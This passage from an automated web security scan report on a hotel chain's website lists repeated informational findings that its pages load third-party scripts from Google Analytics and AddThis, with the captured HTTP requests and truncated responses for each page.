<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.8. http://www.redcarnationhotels.com/careers/join-the-family  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/join-the-family

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/join-the-family HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Join the Family - Red Carnation
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.9. http://www.redcarnationhotels.com/careers/rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/rewards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/rewards HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:57 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Rewards and Perks - Red Carnati
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.10. http://www.redcarnationhotels.com/careers/rewards/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/rewards/benefits

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/rewards/benefits HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:40:59 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:40:59 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Employee Benefits - Red Carnati
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.11. http://www.redcarnationhotels.com/careers/rewards/equal-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/rewards/equal-opportunities

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/rewards/equal-opportunities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:09 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Equal Opportunities - Red Carna
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.12. http://www.redcarnationhotels.com/careers/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/training HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:40:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:40:07 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Training and Development - Red
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.13. http://www.redcarnationhotels.com/careers/training/internal-training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/internal-training

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/training/internal-training HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:42:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:42:17 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Internal Training Qualification
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.14. http://www.redcarnationhotels.com/careers/training/international-qualifications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/international-qualifications

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/training/international-qualifications HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:42:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:42:10 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>International Training Qualific
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.15. http://www.redcarnationhotels.com/careers/training/management-programmes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/management-programmes

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/training/management-programmes HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Management Training Programmes
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.16. http://www.redcarnationhotels.com/careers/training/management-programmes/management1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/management-programmes/management1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/training/management-programmes/management1 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:36 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Management Programme 1 - Red Ca
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.17. http://www.redcarnationhotels.com/careers/training/placements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/placements

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /careers/training/placements HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Work Placements - Red Carnation
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.18. http://www.redcarnationhotels.com/christmas_hotel_london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /christmas_hotel_london

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /christmas_hotel_london HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:23 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Christmas Hotels London, Christ
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.19. http://www.redcarnationhotels.com/christmas_hotel_london/special-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /christmas_hotel_london/special-events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /christmas_hotel_london/special-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/christmas_hotel_london/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:37:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:37:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Christmas Hotels London - Festi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.20. http://www.redcarnationhotels.com/company-information/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/about-us HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.redcarnationhotels.com/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utmb=187643563

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:26:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:26:38 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=82ce90c3c11b5efd5148ad5a7c4d51a6; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotel Chains, Red Carnat
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.21. http://www.redcarnationhotels.com/company-information/about-us/core-values  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us/core-values

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/about-us/core-values HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:29:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:29:40 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=30232f972f5c685430fc1263c5cd98ae; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Core Values - Red Carnation Hot
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.22. http://www.redcarnationhotels.com/company-information/about-us/history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us/history

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/about-us/history HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:28:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:28:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=5a2ce72c18fca6ac297fdedd29d07689; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>History - Red Carnation Hotels<
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.23. http://www.redcarnationhotels.com/company-information/accessibility-info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/accessibility-info

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/accessibility-info HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:28:08 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:28:08 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=a88ef9e0350b896e3c0fa96606c8227c; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Web Accessibility policy ... Re
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.24. http://www.redcarnationhotels.com/company-information/best-rate-guarantee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/best-rate-guarantee

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/best-rate-guarantee HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:36 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=6dcfbf58c508edc87108024a44bd1004; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Best Rate Guarantee</title>
<me
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

